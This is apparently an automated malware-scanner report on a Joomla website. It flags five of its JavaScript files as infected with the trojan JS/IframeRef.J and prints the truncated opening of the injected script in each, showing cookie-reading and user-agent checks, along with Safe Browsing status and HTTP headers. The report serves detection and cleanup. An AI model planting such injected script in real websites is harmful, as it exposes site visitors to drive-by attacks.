New scan:

Malware Scanner report for kozulka-grad.ru

Malicious/Suspicious/Total urls checked
5/0/15
5 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "kozulka-grad.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/9
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=kozulka-grad.ru

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://kozulka-grad.ru/
200 OK
Content-Length: 80435
Content-Type: text/html
clean
http://kozulka-grad.ru/plugins/system/cdscriptegrator/libraries/jquery/js/jquery-1.7.2.min.js
200 OK
Content-Length: 94840
Content-Type: application/x-javascript
clean
http://kozulka-grad.ru/plugins/system/cdscriptegrator/libraries/jquery/js/jquery-noconflict.js
200 OK
Content-Length: 20
Content-Type: application/x-javascript
clean
http://kozulka-grad.ru/plugins/system/cdscriptegrator/libraries/jqueryui/js/jquery-ui-1.8.20.custom.min.js
200 OK
Content-Length: 206731
Content-Type: application/x-javascript
clean
http://kozulka-grad.ru/media/system/js/mootools-core.js
200 OK
Content-Length: 97340
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo
... 3112 bytes are skipped ...
cument.id(element,true);element.parentNode.replaceChild(this.toElement(),element);return this;},inject:function(element){document.id(element,true).appendChild(this.toElement());
return this;},remote:function(){return Swiff.remote.apply(Swiff,[this.toElement()].append(arguments));}});Swiff.CallBacks={};Swiff.remote=function(obj,fn){var rs=obj.CallFunction('<invoke name="'+fn+'" returntype="javascript">'+__flash__argumentsToXML(arguments,2)+"</invoke>");
return eval(rs);};})();

Antivirus reports:

Microsoft
Trojan:JS/IframeRef.J

http://kozulka-grad.ru/media/system/js/core.js
200 OK
Content-Length: 5762
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo
... 3171 bytes are skipped ...
nprops);4<=parseInt(navigator.appVersion)&&win.window.focus()}
function tableOrdering(a,b,c){var d=document.adminForm;d.filter_order.value=a;d.filter_order_Dir.value=b;submitform(c)}function saveorder(a,b){checkAll_button(a,b)}function checkAll_button(a,b){b||(b="saveorder");for(var c=0;c<=a;c++){var d=document.adminForm["cb"+c];if(d){if(!1==d.checked)d.checked=!0}else{alert("You cannot change the order of items, as an item in the list is `Checked Out`");return}}submitform(b)};

Antivirus reports:

Microsoft
Trojan:JS/IframeRef.J

http://kozulka-grad.ru/media/system/js/caption.js
200 OK
Content-Length: 1707
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo
... 529 bytes are skipped ...
e(a.title),c=document.createElement("div"),d=document.createElement("p"),e=a.getAttribute("width"),b=a.getAttribute("align");if(!e)e=a.width;b||(b=a.getStyle("float"));if(!b)b=a.style.styleFloat;if(b==""||!b)b="none";d.appendChild(f);d.className=this.selector.replace(".","_");a.parentNode.insertBefore(c,a);c.appendChild(a);a.title!=
""&&c.appendChild(d);c.className=this.selector.replace(".","_");c.className=c.className+" "+b;c.setAttribute("style","float:"+b);c.style.width=e+"px"}});

Antivirus reports:

Microsoft
Trojan:JS/IframeRef.J

http://kozulka-grad.ru/media/system/js/mootools-more.js
200 OK
Content-Length: 239309
Content-Type: application/x-javascript
clean
http://kozulka-grad.ru/plugins/system/jcemediabox/js/jcemediabox.js?version=1111
200 OK
Content-Length: 57516
Content-Type: application/x-javascript
clean
http://kozulka-grad.ru/templates/vt_sport/vtemtools/menus/vtem_menu.js
200 OK
Content-Length: 10563
Content-Type: application/x-javascript
clean
http://kozulka-grad.ru/components/com_kide/js/base.js
200 OK
Content-Length: 20951
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo
... 3513 bytes are skipped ...
d();
alert(out);
}
}
};
ajax.open('POST', kide.ajax_url+"&task=catpcha_check", true);
ajax.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
ajax.send('recaptcha_challenge_field='+encodeURIComponent(kide.form('recaptcha_challenge_field'))+'&recaptcha_response_field='+encodeURIComponent(kide.form('recaptcha_response_field')));
}
};
kide.events.add('onAjax_captcha_check', kide.captcha.onAjax_check);

Antivirus reports:

Microsoft
Trojan:JS/IframeRef.J

http://kozulka-grad.ru/components/com_kide/templates/default/js/kide.js
200 OK
Content-Length: 7280
Content-Type: application/x-javascript
clean
http://kozulka-grad.ru/modules/mod_slogin/media/slogin.js
200 OK
Content-Length: 4776
Content-Type: application/x-javascript
clean
http://kozulka-grad.ru/modules/mod_dinamods/js/dinamods.js
200 OK
Content-Length: 6021
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo
... 3403 bytes are skipped ...
abpersistence && this.getselectedClassTarget(this.tabs[i]).className=="dm_selected"){
this.expandtab(this.tabs[i]);
persisterror=false;
}
}
}
if (persisterror)
this.expandtab(this.tabs[this.hottabspositions[0]]);
if (parseInt(this.automodeperiod)>500 && this.hottabspositions.length>1){
this.autoruntimer=setInterval(function(){tabinstance.autorun()}, this.automodeperiod);
}

}
}

Antivirus reports:

Microsoft
Trojan:JS/IframeRef.J

http://kozulka-grad.ru/modules/mod_joomleague_matches/assets/js/mod_joomleague_matches.js
200 OK
Content-Length: 5841
Content-Type: application/x-javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: kozulka-grad.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Fri, 09 Jan 2015 06:24:20 GMT
Pragma: no-cache
Server: nginx/1.6.2
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ee98d926ecc6b0e698d1e3ca2331fd3f=5d23f64b3f32c65d62397ab1c1c0cf1c; path=/
Set-Cookie: kide_config=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: kozulka-grad.ru
Referer: http://www.google.com/search?q=kozulka-grad.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.